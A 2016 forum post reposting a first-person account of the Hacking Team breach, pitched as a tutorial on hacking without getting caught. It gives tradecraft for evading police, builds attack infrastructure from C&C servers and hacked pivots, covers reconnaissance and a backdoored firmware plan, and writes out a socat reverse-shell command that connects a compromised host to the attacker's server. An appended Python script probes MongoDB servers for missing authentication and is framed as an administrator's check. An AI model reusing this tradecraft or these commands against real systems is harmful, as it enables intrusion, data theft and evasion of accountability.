
5/4/2016 How to hack, Tips and Tutorials from REAL "Hacker"


2nd May 2016, 12:46 #1

cybersniper (Radiant Heir of Apollo)
How to hack, Tips and Tutorials from REAL "Hacker"

Just sharing, fellow SBs. For those of you who want to learn HACKING, you'll get plenty of tips and tutorials here on how to be successful while hacking and not get caught :)

For those of you who want to know how he hacked the HACKING TEAM (the controversial government spying and hacking tool seller), here's the story. GO HERE!

And for those of you who want to know the STEP BY STEP Tips, Techniques and Tutorials. :)

[1 Introduction]

You'll notice the change in language since the last edition [1]. The
English speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics; the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.

You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citize...tigate_the_FBI
[3] http://www.aljazeera.com/news/2015/0...083914167.html
[4] https://securelist.com/files/2015/02...ak_APT_eng.pdf
[5] http://madrid.cnt.es/noticia/conside...agammagroup

[2 Hacking Team]

Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.

[1] http://www.animalpolitico.com/2015/0...najepolitico/
[2] http://www.prensa.com/politica/clave...251324994.html
[3] http://www.24horas.mx/ecuadorespio...rlosfigueroa/
[4] https://citizenlab.org/2012/10/backd...ngofdissent/
[5] https://citizenlab.org/2014/02/hacki...njournalists/
[6] https://citizenlab.org/2015/03/hacki...getedspyware/
[7] http://focusecuador.net/2015/07/08/h...osenecuador/
[8] http://www.pri.org/stories/2015070...sarepersonal
[9] https://theintercept.com/2015/07/07/...ivecountries/
[10] http://www.wired.com/2013/06/spytoo...ogovernments/
[11] http://www.theregister.co.uk/2015/07...m_vietnam_apt/
[12] http://www.ilmessaggero.it/primopian...m1588888.html
[13] http://motherboard.vice.com/en_ca/re...kthedarkweb

http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn
[3 Stay safe out there]

Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:

1) Encrypt your hard disk [2]

I guess when the police arrive to seize your computer, it means you've
already made a lot of mistakes, but it's better to be safe.

2) Use a virtual machine with all traffic routed through Tor

This accomplishes two things. First, all your traffic is anonymized through
Tor. Second, keeping your personal life and your hacking on separate
computers helps you not to mix them by accident.

You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
something custom [6]. Here's [7] a detailed comparison.

3) (Optional) Don't connect directly to Tor

Tor isn't a panacea. They can correlate the times you're connected to Tor
with the times your hacker handle is active. Also, there have been
successful attacks against Tor [8]. You can connect to Tor using other
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
before Tor, but that's less secure because they can still correlate the
hacker's activity with your house's internet activity (this was used as
evidence against Jeremy Hammond [11]).

The reality is that while Tor isn't perfect, it works quite well. When I
was young and reckless, I did plenty of stuff without any protection (I'm
referring to hacking) apart from Tor, that the police tried their hardest
to investigate, and I've never had any problems.

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects...ansparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor...mationattack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documen...anarchaos.html

[3.1 Infrastructure]

I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:

1) Domain Names

For C&C addresses, and for DNS tunnels for guaranteed egress.

2) Stable Servers

For use as C&C servers, to receive connect-back shells, to launch attacks,
and to store the loot.

3) Hacked Servers

For use as pivots to hide the IP addresses of the stable servers. And for
when I want a fast connection without pivoting, for example to scan ports,
scan the whole internet, download a database with sqli, etc.

Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).

[3.2 Attribution]

In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.

I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day to day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and paid for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.

[4 Information Gathering]

Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.

[4.1 Technical Information]

Some tools and techniques are:

1) Google

A lot of interesting things can be found with a few well chosen search
queries. For example, the identity of DPR [1]. The bible of Google hacking
is the book "Google Hacking for Penetration Testers". You can find a short
summary in Spanish at [2].

2) Subdomain Enumeration

Often, a company's main website is hosted by a third party, and you'll find
the company's actual IP range thanks to subdomains like mx.company.com or
ns1.company.com. Also, sometimes there are things that shouldn't be exposed
in "hidden" subdomains. Useful tools for discovering domains and subdomains
are fierce [3], theHarvester [4], and recon-ng [5].

3) Whois lookups and reverse lookups

With a reverse lookup using the whois information from a domain or IP range
of a company, you can find other domains and IP ranges. As far as I know,
there's no free way to do reverse lookups aside from a google "hack":

    "via della moscova 13" site:www.findip-address.com
    "via della moscova 13" site:domaintools.com

4) Port scanning and fingerprinting

Unlike the other techniques, this talks to the company's servers. I
include it in this section because it's not an attack, it's just
information gathering. The company's IDS might generate an alert, but you
don't have to worry since the whole internet is being scanned constantly.

For scanning, nmap [6] is precise, and can fingerprint the majority of
services discovered. For companies with very large IP ranges, zmap [7] or
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
sites.

[1] http://www.nytimes.com/2015/12/27/bu...silkroad.html
[2] http://web.archive.org/web/201406100...con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/

[4.2 Social Information]

For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:

1) Google

Here as well, it's the most useful tool.

2) theHarvester and recon-ng

I already mentioned them in the previous section, but they have a lot more
functionality. They can find a lot of information quickly and
automatically. It's worth reading all their documentation.

3) LinkedIn

A lot of information about the employees can be found here. The company's
recruiters are the most likely to accept your connection requests.

4) Data.com

Previously known as jigsaw. They have contact information for many
employees.

5) File Metadata

A lot of information about employees and their systems can be found in
metadata of files the company has published. Useful tools for finding
files on the company's website and extracting the metadata are metagoofil
[1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labst...a2/index.html

[5 Entering the network]

There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.

[5.1 Social Engineering]


Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.

[1] http://www.hacknbytes.com/2016/01/ap...onempire.html
[2] http://blog.cobaltstrike.com/2015/09...rseandnotes/
[3] http://www.netcomunity.com/lesterthe...ingsocial1.pdf

[5.2 Buying Access]

Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of its employees are infosec experts, so there was a low chance that they'd
already been compromised.

[5.3 Technical Exploitation]

After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:

    inetnum: 93.62.139.32 - 93.62.139.47
    descr:   HT public subnet

Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation...mDA2z9zzHpon8A

[6 Be Prepared]

I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.

The post-exploitation tools that I'd prepared were:

1) busybox [1]

For all the standard Unix utilities that the system didn't have.

2) nmap [2]

To scan and fingerprint Hacking Team's internal network.

3) Responder.py [3]

The most useful tool for attacking windows networks when you have access to
the internal network, but no domain user.

4) Python [4]

To execute Responder.py

5) tcpdump [5]

For sniffing traffic.

6) dsniff [6]

For sniffing passwords from plaintext protocols like ftp, and for
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
and NaGA, but it was hard to compile it for the system.

7) socat [7]

For a comfortable shell with a pty:

    my_server:  socat file:`tty`,raw,echo=0 tcp-listen:my_port
    hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
                      tcp:my_server:my_port

And useful for a lot more, it's a networking swiss army knife. See the
examples section of its documentation.

8) screen [8]


Like the shell with pty, it wasn't really necessary, but I wanted to feel
at home in Hacking Team's network.

9) a SOCKS proxy server [9]

To use with proxychains to be able to access their local network from any
program.

10) tgcd [10]

For forwarding ports, like for the SOCKS server, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://averagecoder.blogspot.com/20...rverinc.html
[10] http://tgcd.sourceforge.net/

The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.

[7 Watch and Listen]

Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.

[8 NoSQL Databases]

NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:

    27017/tcp open  mongodb  MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 47547
    |   totalSize = 49856643072
    ...
    |_  version = 2.6.5

    27017/tcp open  mongodb  MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 31987
    |   totalSize = 33540800512
    |   databases
    ...
    |_  version = 2.6.5

They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/communi...flawinmysql
[3] http://archives.neohapsis.com/archiv...4q3/0001.html
[4] http://downloads.securityfocus.com/v...hoagie_mysql.c
[5] http://archives.neohapsis.com/archiv...002/0053.html
[6] https://ht.transparencytoolkit.org/audio/

CONTINUATION............... It doesn't fit anymore, too many characters apparently, hehe :)

FOR THE COMPLETE TUTORIAL VISIT

http://pinoyprogrammer.co/vigilante...teamexplains/

Updated

I hope you find it very useful. Enjoy Learning : )

Last edited by cybersniper; 2nd May 2016 at 16:58.

"I Wouldn't Say I'm a Hacker"
"I Would Say! I AM a Researcher"
"And I post all my Research in one Place AND SHARE IT TO OTHERS"
http://pinoyprogrammer.co/ :)
Visit my site to find out more and access all my RESEARCH in
"SECURITY, HACKING, PROGRAMMING, WEB DEVELOPMENT AND INTERNET TIPS AND TRICKS"

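The MongoDB instances in section 8 of the post above were found because nmap's mongodb-databases script could run listDatabases against them without any credentials: that is the "NoAuthentication" the writeup is talking about. The following is an added example, not code from the original post or from the Hack Back writeup. It is a small Python probe that speaks MongoDB's legacy OP_QUERY/OP_REPLY wire protocol (the one a 2.6.x server uses) with a hand-rolled BSON encoder and decoder, sends listDatabases to admin.$cmd with no credentials, and reports the database names if the server answers, or None if the server refuses with ok:0 (authentication enabled). The host argument, port 27017 default, and the two sample reply messages are constructed assumptions for an offline run; the database names in the sample are invented and are not data from Hacking Team's network.

```python
"""Added example: probe a MongoDB server for the 'no authentication' condition.

Legacy OP_QUERY / OP_REPLY wire protocol with a minimal BSON codec, standard
library only.  The sample replies at the bottom are constructed for the demo.
"""
import socket
import struct
import sys

OP_REPLY = 1
OP_QUERY = 2004


def bson_encode(doc):
    """Encode a dict (int/float/bool/str/list/dict values) as one BSON document."""
    out = b""
    for key, val in doc.items():
        k = key.encode() + b"\x00"
        if isinstance(val, bool):          # bool first: bool is an int subclass
            out += b"\x08" + k + (b"\x01" if val else b"\x00")
        elif isinstance(val, int):
            out += b"\x10" + k + struct.pack("<i", val)
        elif isinstance(val, float):
            out += b"\x01" + k + struct.pack("<d", val)
        elif isinstance(val, str):
            s = val.encode() + b"\x00"
            out += b"\x02" + k + struct.pack("<i", len(s)) + s
        elif isinstance(val, list):        # BSON arrays are documents keyed "0","1",...
            out += b"\x04" + k + bson_encode({str(i): v for i, v in enumerate(val)})
        elif isinstance(val, dict):
            out += b"\x03" + k + bson_encode(val)
        else:
            raise TypeError("unsupported value type %r" % type(val))
    return struct.pack("<i", len(out) + 5) + out + b"\x00"   # int32 size ... NUL


def bson_decode(buf, pos=0):
    """Decode one BSON document at buf[pos]; return (dict, position after it)."""
    end = pos + struct.unpack_from("<i", buf, pos)[0]
    pos += 4
    doc = {}
    while buf[pos] != 0:
        kind, pos = buf[pos], pos + 1
        kend = buf.index(b"\x00", pos)
        key, pos = buf[pos:kend].decode(), kend + 1
        if kind == 0x01:                    # double
            val, pos = struct.unpack_from("<d", buf, pos)[0], pos + 8
        elif kind == 0x02:                  # string: int32 length incl. NUL
            n = struct.unpack_from("<i", buf, pos)[0]
            val, pos = buf[pos + 4:pos + 3 + n].decode(), pos + 4 + n
        elif kind in (0x03, 0x04):          # embedded document / array
            val, pos = bson_decode(buf, pos)
            if kind == 0x04:
                val = [val[i] for i in sorted(val, key=int)]
        elif kind == 0x08:                  # bool
            val, pos = buf[pos] == 1, pos + 1
        elif kind == 0x10:                  # int32
            val, pos = struct.unpack_from("<i", buf, pos)[0], pos + 4
        elif kind == 0x12:                  # int64
            val, pos = struct.unpack_from("<q", buf, pos)[0], pos + 8
        else:
            raise ValueError("unsupported BSON type 0x%02x" % kind)
        doc[key] = val
    return doc, end


def build_op_query(request_id, collection, query):
    """OP_QUERY: 16-byte header, flags, collection, skip, numberToReturn, query doc."""
    body = (struct.pack("<i", 0) + collection.encode() + b"\x00"
            + struct.pack("<ii", 0, -1) + bson_encode(query))
    return struct.pack("<iiii", 16 + len(body), request_id, 0, OP_QUERY) + body


def build_op_reply(response_to, docs):
    """OP_REPLY shaped like a server's answer; used only to construct test data."""
    body = struct.pack("<iqii", 0, 0, 0, len(docs)) + b"".join(map(bson_encode, docs))
    return struct.pack("<iiii", 16 + len(body), 1, response_to, OP_REPLY) + body


def parse_op_reply(msg):
    """Return the documents carried by an OP_REPLY message."""
    if struct.unpack_from("<iiii", msg, 0)[3] != OP_REPLY:
        raise ValueError("not an OP_REPLY")
    nreturned = struct.unpack_from("<iqii", msg, 16)[3]
    docs, pos = [], 36                    # header(16)+flags(4)+cursorID(8)+start(4)+n(4)
    for _ in range(nreturned):
        doc, pos = bson_decode(msg, pos)
        docs.append(doc)
    return docs


def open_databases(reply_doc):
    """listDatabases result -> names; None when refused (auth on: ok == 0, errmsg)."""
    if reply_doc.get("ok") != 1:
        return None
    return [d["name"] for d in reply_doc.get("databases", [])]


def probe(host, port=27017, timeout=5):
    """Send listDatabases with no credentials and interpret the server's answer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_op_query(1, "admin.$cmd", {"listDatabases": 1}))
        data = b""
        while len(data) < 4 or len(data) < struct.unpack_from("<i", data)[0]:
            chunk = s.recv(65536)
            if not chunk:
                raise ConnectionError("short read from %s:%d" % (host, port))
            data += chunk
    docs = parse_op_reply(data)
    return open_databases(docs[0]) if docs else None


# Constructed sample replies (invented names and sizes, not real data).
SAMPLE_OPEN_REPLY = build_op_reply(1, [{
    "databases": [{"name": "rcs", "sizeOnDisk": 49856643072.0, "empty": False},
                  {"name": "local", "sizeOnDisk": 83886080.0, "empty": False}],
    "totalSize": 49940529152.0, "ok": 1.0}])
SAMPLE_DENIED_REPLY = build_op_reply(1, [
    {"ok": 0.0, "errmsg": "not authorized on admin to execute command", "code": 13}])

if __name__ == "__main__":
    if len(sys.argv) > 1:                                   # python mongo_probe.py HOST
        print(probe(sys.argv[1]))
    else:
        print(open_databases(parse_op_reply(SAMPLE_OPEN_REPLY)))    # ['rcs', 'local']
        print(open_databases(parse_op_reply(SAMPLE_DENIED_REPLY)))  # None
```

Run it with a host argument against a test instance you own and it returns the database list exactly as the nmap script did; a server started with --auth answers the same request with ok:0 and error code 13, which is the check an administrator should run against every 27017 listener on an internal range before a Responder-style foothold does it for them. numberToReturn is -1 so the server returns a single document and closes the cursor, which is what a command on admin.$cmd expects.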